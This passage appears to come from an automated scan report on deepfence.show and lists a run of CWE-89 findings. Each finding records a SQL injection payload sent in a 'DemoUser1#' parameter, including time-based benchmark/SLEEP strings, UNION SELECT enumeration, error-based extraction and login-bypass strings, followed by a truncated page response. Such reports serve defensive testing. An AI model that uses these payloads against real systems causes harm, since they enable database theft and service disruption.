length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1718\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ')) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1719\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK\n(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1720\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1721\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# 1 or benchmark(10000000,MD5(1))\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1722\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(\n1000000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1723\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# /*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1724\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# //\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1725\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1726\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin') or ('1'='1'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1727\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or 1=1/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1728\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' and 1 in (select min(name) from sysobjects where xtype = '\nU' and name > '.') --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1729\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1730\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(\n0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,\nFLOOR(RAND(0)*2))x FROM \nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1731\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE 